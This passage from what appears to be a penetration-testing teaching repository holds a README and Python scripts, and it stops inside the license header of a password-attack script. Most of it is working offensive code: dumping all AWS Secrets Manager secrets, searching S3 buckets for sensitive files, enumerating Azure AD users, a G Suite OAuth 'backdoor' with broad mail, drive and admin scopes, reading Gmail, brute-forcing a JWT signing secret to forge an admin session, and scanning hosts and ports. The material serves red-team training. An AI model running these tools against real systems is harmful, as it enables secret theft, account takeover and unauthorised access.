[
  {
    "path": ".gitignore",
    "content": "# Byte-compiled / optimized / DLL files\r\n__pycache__/\r\n*.py[cod]\r\n*$py.class\r\n\r\n# C extensions\r\n*.so\r\n\r\n# Distribution / packaging\r\n.Python\r\nbuild/\r\ndevelop-eggs/\r\ndist/\r\ndownloads/\r\neggs/\r\n.eggs/\r\nlib/\r\nlib64/\r\nparts/\r\nsdist/\r\nvar/\r\nwheels/\r\npip-wheel-metadata/\r\nshare/python-wheels/\r\n*.egg-info/\r\n.installed.cfg\r\n*.egg\r\nMANIFEST\r\n\r\n# PyInstaller\r\n#  Usually these files are written by a python script from a template\r\n#  before PyInstaller builds the exe, so as to inject date/other infos into it.\r\n*.manifest\r\n*.spec\r\n\r\n# Installer logs\r\npip-log.txt\r\npip-delete-this-directory.txt\r\n\r\n# Unit test / coverage reports\r\nhtmlcov/\r\n.tox/\r\n.nox/\r\n.coverage\r\n.coverage.*\r\n.cache\r\nnosetests.xml\r\ncoverage.xml\r\n*.cover\r\n*.py,cover\r\n.hypothesis/\r\n.pytest_cache/\r\ncover/\r\n\r\n# Translations\r\n*.mo\r\n*.pot\r\n\r\n# Django stuff:\r\n*.log\r\nlocal_settings.py\r\ndb.sqlite3\r\ndb.sqlite3-journal\r\n\r\n# Flask stuff:\r\ninstance/\r\n.webassets-cache\r\n\r\n# Scrapy stuff:\r\n.scrapy\r\n\r\n# Sphinx documentation\r\ndocs/_build/\r\n\r\n# PyBuilder\r\ntarget/\r\n\r\n# Jupyter Notebook\r\n.ipynb_checkpoints\r\n\r\n# IPython\r\nprofile_default/\r\nipython_config.py\r\n\r\n# pyenv\r\n#   For a library or package, you might want to ignore these files since the code is\r\n#   intended to run in multiple environments; otherwise, check them in:\r\n# .python-version\r\n\r\n# pipenv\r\n#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.\r\n#   However, in case of collaboration, if having platform-specific dependencies or dependencies\r\n#   having no cross-platform support, pipenv may install dependencies that don't work, or not\r\n#   install all needed dependencies.\r\n#Pipfile.lock\r\n\r\n# PEP 582; used by e.g. 
github.com/David-OConnor/pyflow\r\n__pypackages__/\r\n\r\n# Celery stuff\r\ncelerybeat-schedule\r\ncelerybeat.pid\r\n\r\n# SageMath parsed files\r\n*.sage.py\r\n\r\n# Environments\r\n.env\r\n.venv\r\nenv/\r\nvenv/\r\nENV/\r\nenv.bak/\r\nvenv.bak/\r\nScripts/\r\ntcl/\r\nInclude/\r\nshare/\r\n\r\n# Spyder project settings\r\n.spyderproject\r\n.spyproject\r\n\r\n# Rope project settings\r\n.ropeproject\r\n\r\n# mkdocs documentation\r\n/site\r\n\r\n# mypy\r\n.mypy_cache/\r\n.dmypy.json\r\ndmypy.json\r\n\r\n# Pyre type checker\r\n.pyre/\r\n\r\n# pytype static type analyzer\r\n.pytype/"
  },
  {
    "path": "LICENSE",
    "content": "MIT License\r\n\r\nCopyright (c) 2020 ustayready\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n"
  },
  {
    "path": "README.md",
    "content": "Python for Pentesters\r\n=====================\r\n\r\n## Overview ##\r\nGetting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started.\r\n\r\n**Brought to you by:**\r\n\r\n![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png \"Black Hills Information Security\")\r\n\r\n## Examples: by Mike Felch (@ustayready) and Joff Thyer (@joff_thyer) ##\r\nThis code is provided purely for educational purposes.\r\n\r\n * pivot_winrm.py: Shows how to use Python with WinRM to execute commands on a remote machine\r\n * cloud_aws_s3.py: Search AWS S3 buckets for sensitive filenames\r\n * cloud_aws_secrets.py: Dump all the secrets in AWS Secrets Manager\r\n * cloud_azure_ad.py: Dumping Azure AD users\r\n * cloud_gsuite_backdoor.py: Backdooring G Suite accounts for full access\r\n * cloud_gsuite_email.py: Reading Gmail emails\r\n * crack_jwt.py: Cracking JSON Web Tokens\r\n * live_host_discovery.py: Discovering live hosts on a network\r\n * live_port_discovery.py: Discovering open ports on a host\r\n * passwords_attack.py: Trying username/password combinations on a web authentication portal\r\n * pivot_psremoting.py: Pivoting in a Windows environment using PSRemoting\r\n * pivot_wmi.py: Pivoting in a Windows environment using WMI\r\n * shodan_search.py: Searching for internet-connected devices on Shodan\r\n * socket_c2_client.py: C2 socket client\r\n * socket_c2_server.py: C2 socket server\r\n * web_brute.py: Brute forcing web paths for unknown attack surfaces\r\n * web_robots.py: Downloading the robots.txt for URLs\r\n * web_sniff.py: Sniffing HTTP packets\r\n * web_spa.py: Interacting with a single-page app in a headless browser, then copying the session cookies to the requests library\r\n * pymeta.py: Reads all files in a directory recursively and extracts metadata from any Office documents and PDFs discovered\r\n * powerstrip.py: Strips comments out of a PowerShell script and writes a copy with -stripped as part of the filename\r\n * pyinjector.py: Using ctypes to execute shellcode within the same process or inject into a remote process using thread manipulation\r\n"
  },
  {
    "path": "aws_services.txt",
    "content": "AccessAnalyzer \r\nACM \r\nACMPCA \r\nAlexaForBusiness \r\nAmplify \r\nAPIGateway \r\nApiGatewayManagementApi \r\nApiGatewayV2 \r\nAppConfig \r\nApplicationAutoScaling \r\nApplicationInsights \r\nAppMesh \r\nAppStream \r\nAppSync \r\nAthena \r\nAutoScaling \r\nAutoScalingPlans \r\nBackup \r\nBatch \r\nBudgets \r\nCostExplorer \r\nChime \r\nCloud9 \r\nCloudDirectory \r\nCloudFormation \r\nCloudFront \r\nCloudHSM \r\nCloudHSMV2 \r\nCloudSearch \r\nCloudSearchDomain \r\nCloudTrail \r\nCloudWatch \r\nCodeBuild \r\nCodeCommit \r\nCodeDeploy \r\nCodeGuruReviewer \r\nCodeGuruProfiler \r\nCodePipeline \r\nCodeStar \r\nCodeStarconnections \r\nCodeStarNotifications \r\nCognitoIdentity \r\nCognitoIdentityProvider \r\nCognitoSync \r\nComprehend \r\nComprehendMedical \r\nComputeOptimizer \r\nConfigService \r\nConnect \r\nConnectParticipant \r\nCostandUsageReportService \r\nDataExchange \r\nDataPipeline \r\nDataSync \r\nDAX \r\nDetective \r\nDeviceFarm \r\nDirectConnect \r\nApplicationDiscoveryService \r\nDLM \r\nDatabaseMigrationService \r\nDocDB \r\nDirectoryService \r\nDynamoDB \r\nDynamoDBStreams \r\nEBS \r\nEC2 \r\nEC2InstanceConnect \r\nECR \r\nECS \r\nEFS \r\nEKS \r\nElasticInference \r\nElastiCache \r\nElasticBeanstalk \r\nElasticTranscoder \r\nElasticLoadBalancing \r\nElasticLoadBalancingv2 \r\nEMR \r\nElasticsearchService \r\nEventBridge \r\nFirehose \r\nFMS \r\nForecastService \r\nForecastQueryService \r\nFraudDetector \r\nFSx \r\nGameLift \r\nGlacier \r\nGlobalAccelerator \r\nGlue \r\nGreengrass \r\nGroundStation \r\nGuardDuty \r\nHealth \r\nIAM \r\nimagebuilder \r\nImportExport \r\nInspector \r\nIoT \r\nIoTDataPlane \r\nIoTJobsDataPlane \r\nIoT1ClickDevicesService \r\nIoT1ClickProjects \r\nIoTAnalytics \r\nIoTEvents \r\nIoTEventsData \r\nIoTSecureTunneling \r\nIoTThingsGraph \r\nKafka \r\nkendra \r\nKinesis \r\nKinesisVideoArchivedMedia \r\nKinesisVideoMedia \r\nKinesisVideoSignalingChannels \r\nKinesisAnalytics \r\nKinesisAnalyticsV2 
\r\nKinesisVideo \r\nKMS \r\nLakeFormation \r\nLambda \r\nLexModelBuildingService \r\nLexRuntimeService \r\nLicenseManager \r\nLightsail \r\nCloudWatchLogs \r\nMachineLearning \r\nMacie \r\nManagedBlockchain \r\nMarketplaceCatalog \r\nMarketplaceEntitlementService \r\nMarketplaceCommerceAnalytics \r\nMediaConnect \r\nMediaConvert \r\nMediaLive \r\nMediaPackage \r\nMediaPackageVod \r\nMediaStore \r\nMediaStoreData \r\nMediaTailor \r\nMarketplaceMetering \r\nMigrationHub \r\nMigrationHubConfig \r\nMobile \r\nMQ \r\nMTurk \r\nNeptune \r\nNetworkManager \r\nOpsWorks \r\nOpsWorksCM \r\nOrganizations \r\nOutposts \r\nPersonalize \r\nPersonalizeEvents \r\nPersonalizeRuntime \r\nPI \r\nPinpoint \r\nPinpointEmail \r\nPinpointSMSVoice \r\nPolly \r\nPricing \r\nQLDB \r\nQLDBSession \r\nQuickSight \r\nRAM \r\nRDS \r\nRDSDataService \r\nRedshift \r\nRekognition \r\nResourceGroups \r\nResourceGroupsTaggingAPI \r\nRoboMaker \r\nRoute53 \r\nRoute53Domains \r\nRoute53Resolver \r\nS3 \r\nS3Control \r\nSageMaker \r\nAugmentedAIRuntime \r\nSageMakerRuntime \r\nSavingsPlans \r\nSchemas \r\nSimpleDB \r\nSecretsManager \r\nSecurityHub \r\nServerlessApplicationRepository \r\nServiceQuotas \r\nServiceCatalog \r\nServiceDiscovery \r\nSES \r\nSESV2 \r\nShield \r\nsigner \r\nSMS \r\nPinpointSMSVoice \r\nSnowball \r\nSNS \r\nSQS \r\nSSM \r\nSSO \r\nSSOOIDC \r\nSFN \r\nStorageGateway \r\nSTS \r\nSupport \r\nSWF \r\nTextract \r\nTranscribeService \r\nTransfer \r\nTranslate \r\nWAF \r\nWAFRegional \r\nWAFV2 \r\nWorkDocs \r\nWorkLink \r\nWorkMail \r\nWorkMailMessageFlow \r\nWorkSpaces \r\nXRay "
  },
  {
    "path": "cloud_aws_s3.py",
    "content": "from botocore.exceptions import ClientError\r\nimport boto3\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(access_key, secret_access_key, query):\r\n\tsession = boto3.Session(\r\n\t\taws_access_key_id=access_key,\r\n\t\taws_secret_access_key=secret_access_key,\r\n\t)\r\n\r\n\ts3 = session.resource('s3')\r\n\tfor bucket in s3.buckets.all():\r\n\t\tprint('Enumerating bucket: {}'.format(bucket.name))\r\n\t\ttry:\r\n\t\t\tfor key in bucket.objects.all():\r\n\t\t\t\tif query in key.key:\r\n\t\t\t\t\tprint('[-] Found gold: {}'.format(key.key))\r\n\t\texcept ClientError as ex:\r\n\t\t\t# Listing can fail for a single bucket (e.g. AccessDenied); report it and move on instead of aborting the run\r\n\t\t\tprint('[!] Could not list {}: {}'.format(bucket.name, ex))\r\n\r\nif __name__ == '__main__':\r\n\taccess_key = sys.argv[1]\r\n\tsecret_access_key = sys.argv[2]\r\n\tquery = sys.argv[3]\r\n\r\n\tmain(access_key, secret_access_key, query)\r\n"
  },
  {
    "path": "cloud_aws_secrets.py",
    "content": "import boto3\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef leak_secrets(access_key, secret_access_key, region_name):\r\n\tsession = boto3.Session(\r\n\t\taws_access_key_id=access_key,\r\n\t\taws_secret_access_key=secret_access_key,\r\n\t\tregion_name=region_name,\r\n\t)\r\n\tclient = session.client(service_name='secretsmanager')\r\n\r\n\tresponse = client.list_secrets()\r\n\tfor secret in response['SecretList']:\r\n\t\tsecret_name = secret['Name']\r\n\t\t# 'Description' is optional in the ListSecrets response, so don't index it directly\r\n\t\tsecret_desc = secret.get('Description', '')\r\n\r\n\t\tsecret_val_resp = client.get_secret_value(SecretId=secret_name)\r\n\r\n\t\tprint('{}: {}'.format(secret_name, secret_desc))\r\n\r\n\t\tif 'SecretString' in secret_val_resp:\r\n\t\t\tsecret_val = secret_val_resp['SecretString']\r\n\t\t\tprint(secret_val)\r\n\t\telse:\r\n\t\t\tprint('Binary Data Found!')\r\n\r\nif __name__ == '__main__':\r\n\taccess_key = sys.argv[1]\r\n\tsecret_access_key = sys.argv[2]\r\n\tregion_name = sys.argv[3]\r\n\r\n\tleak_secrets(access_key, secret_access_key, region_name)\r\n"
  },
  {
    "path": "cloud_azure_ad.py",
    "content": "from msrestazure.azure_active_directory import AADTokenCredentials\r\nimport adal\r\nimport requests\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(domain, client_id, client_secret):\r\n\turl = 'https://login.microsoftonline.com/{}/oauth2/v2.0/token'.format(domain)\r\n\tdata = {\r\n\t\t'grant_type': 'client_credentials',\r\n\t\t'client_id': client_id,\r\n\t\t'scope': 'https://graph.microsoft.com/.default',\r\n\t\t'client_secret': client_secret,\r\n\t}\r\n\tr = requests.post(url, data=data)\r\n\ttoken = r.json().get('access_token')\r\n\tif not token:\r\n\t\t# No token means the client credentials grant was refused; the response body carries the error\r\n\t\tprint(r.text)\r\n\t\treturn\r\n\r\n\turl_users = 'https://graph.microsoft.com/v1.0/users'\r\n\t#url_groups = 'https://graph.microsoft.com/beta/groups'\r\n\theaders = {\r\n\t\t'Content-Type': 'application/json',\r\n\t\t'Authorization': 'Bearer {}'.format(token)\r\n\t}\r\n\tr = requests.get(url_users, headers=headers)\r\n\tresult = r.json()\r\n\tprint(result)\r\n\r\nif __name__ == '__main__':\r\n\tdomain = sys.argv[1]\r\n\tclient_id = sys.argv[2]\r\n\tclient_secret = sys.argv[3]\r\n\tmain(domain, client_id, client_secret)"
  },
  {
    "path": "cloud_gsuite_backdoor.py",
    "content": "#!/usr/bin/env python\r\nimport os\r\nfrom oauth2client import client, tools\r\nfrom oauth2client.file import Storage\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\nSCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user'\r\n\r\ndef get_credentials():\r\n\tcredential_dir =os.getcwd()\r\n\tclient_secret_path = os.path.join(credential_dir, 'client_secrets.json')\r\n\tsaved_secret_path = os.path.join(credential_dir, 'saved_creds.json')\r\n\r\n\tstore = Storage(saved_secret_path)\r\n\tcredentials = store.get()\r\n\tif not credentials or credentials.invalid:\r\n\t\tflow = client.flow_from_clientsecrets(client_secret_path, SCOPES, redirect_uri='http://localhost')\r\n\t\turl = flow.step1_get_authorize_url()\r\n\t\tflags = tools.argparser.parse_args(args=[])\r\n\t\tflags.noauth_local_webserver = True\r\n\t\tcredentials = tools.run_flow(flow, store, flags=flags)\r\n\treturn credentials\r\n\r\nif __name__ == \"__main__\":\r\n\tget_credentials()"
  },
  {
    "path": "cloud_gsuite_email.py",
    "content": "from googleapiclient.discovery import build\r\nfrom httplib2 import Http\r\nfrom oauth2client import file, client, tools\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\nSCOPES = 'https://www.googleapis.com/auth/gmail.readonly'\r\n\r\ndef main():\r\n\tstore = file.Storage('token.json')\r\n\tcreds = store.get()\r\n\tif not creds or creds.invalid:\r\n\t\tflow = client.flow_from_clientsecrets('credentials.json', SCOPES)\r\n\t\tcreds = tools.run_flow(flow, store)\r\n\tservice = build('gmail', 'v1', http=creds.authorize(Http()))\r\n\t\r\n\tresults = service.users().messages().list(userId='me',labelIds = ['INBOX']).execute()\r\n\tmessages = results.get('messages', [])\r\n\r\n\tfor message in messages:\r\n\t\tmsg = service.users().messages().get(userId='me', id=message['id']).execute()\r\n\t\tprint(msg['snippet'])\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\r\n\r\n\r\n\r\n\t"
  },
  {
    "path": "crack_jwt.py",
    "content": "import sys\r\nimport jwt\r\nimport requests\r\nimport time\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(url, password_file):\r\n\tresponse = requests.get(url, headers={'user-agent':'pentest'})\r\n\r\n\tif 'session' in response.cookies:\r\n\t\ttoken = response.cookies['session']\r\n\t\tprint(f'Old Token: {token}\\n')\r\n\t\twith open(password_file,'r') as file:\r\n\t\t\tpasswords = [x.strip() for x in file.readlines()]\r\n\t\t\tfor password in passwords:\r\n\t\t\t\tsuccess = decode_jwt(token, password)\r\n\t\t\t\tif success:\r\n\t\t\t\t\tnew_session = exploit(token, password)\r\n\t\t\t\t\tcook = { 'session': new_session }\r\n\t\t\t\t\tnew_request = requests.get(url,cookies=cook, headers={'user-agent':'pentest'})\r\n\t\t\t\t\tprint(new_request.text)\r\n\t\t\t\t\tbreak\r\n\r\ndef exploit(token, password):\r\n\tdecoded = jwt.decode(token, 
password)\r\n\tdecoded['user_id'] = 'admin'\r\n\tdecoded['is_admin'] = 'true' \r\n\tencoded = jwt.encode(decoded,password).decode('utf-8')\r\n\tprint(f'New Token: {encoded}\\n')\r\n\treturn encoded\r\n\r\ndef decode_jwt(token, password):\r\n\ttry:\r\n\t\tdecoded = jwt.decode(token, password)\r\n\t\tprint(f'Password found! {password}\\n')\r\n\t\treturn True\r\n\texcept:\r\n\t\treturn False\r\n\r\nif __name__ == '__main__':\r\n\turl = sys.argv[1]\r\n\tpassword_file = sys.argv[2]\r\n\t\r\n\tmain(url, password_file)\r\n"
  },
  {
    "path": "live_host_discovery.py",
    "content": "from ping3 import ping\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(host):\r\n\t# ping3.ping() returns the round-trip delay in seconds, or a falsy value (None/False) on timeout or error\r\n\tdelay = ping(host)\r\n\tif delay:\r\n\t\tprint(f'{host} is alive.')\r\n\telse:\r\n\t\tprint(f'{host} is NOT alive.')\r\n\r\nif __name__ == '__main__':\r\n\thost = sys.argv[1]\r\n\r\n\tmain(host)"
  },
  {
    "path": "live_port_discovery.py",
    "content": "import socket\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(host, ports):\r\n\tscan_range = []\r\n\r\n\tif '-' in ports:\r\n\t\tstart_port, stop_port = ports.split('-')\r\n\t\tfor port in range(int(start_port), int(stop_port)+1):\r\n\t\t\tscan_range.append(port)\r\n\telif ',' in ports:\r\n\t\tfor port in ports.split(','):\r\n\t\t\tport = int(port.strip())\r\n\t\t\tscan_range.append(port)\r\n\telse:\r\n\t\t# A single port: scan only that port\r\n\t\tscan_range.append(int(ports))\r\n\r\n\treturn check_ports(host, scan_range)\r\n\r\ndef check_ports(host, ports):\r\n\tport_results = []\r\n\tfor port in ports:\r\n\t\ttry:\r\n\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\t\t# Without a timeout a filtered port can block connect_ex() for a long time\r\n\t\t\tsock.settimeout(2)\r\n\t\t\tresult = sock.connect_ex((host, port))\r\n\t\t\tif result == 0:\r\n\t\t\t\tprint(f'{host} -> {port}: up')\r\n\t\t\t\tport_results.append((port, True))\r\n\t\t\telse:\r\n\t\t\t\tport_results.append((port, False))\r\n\t\t\tsock.close()\r\n\t\texcept Exception as ex:\r\n\t\t\tprint(f'{host} -> {port}: down')\r\n\t\t\tport_results.append((port, False))\r\n\treturn port_results\r\n\r\nif __name__ == '__main__':\r\n\thost = sys.argv[1]\r\n\tport_range = sys.argv[2]\r\n\tmain(host, port_range)"
  },
  {
    "path": "passwords_attack.py",
    "content": "import requests\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH 